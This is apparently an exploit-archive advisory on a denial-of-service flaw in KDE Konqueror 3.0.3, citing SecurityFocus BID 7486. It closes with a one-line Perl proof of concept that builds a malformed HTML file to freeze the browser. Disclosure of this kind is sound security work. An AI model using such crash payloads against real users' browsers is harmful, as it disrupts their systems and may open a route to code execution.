KDE Konqueror 3.0.3 Malformed HTML Page Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/7486/info


KDE Konqueror has been reported prone to a denial of service vulnerability when rendering a HTML page that contains malformed data.

Although unconfirmed, code execution may be possible.

The precise technical details of this vulnerability are currently unknown. This BID will be updated, as further information is available. 

perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm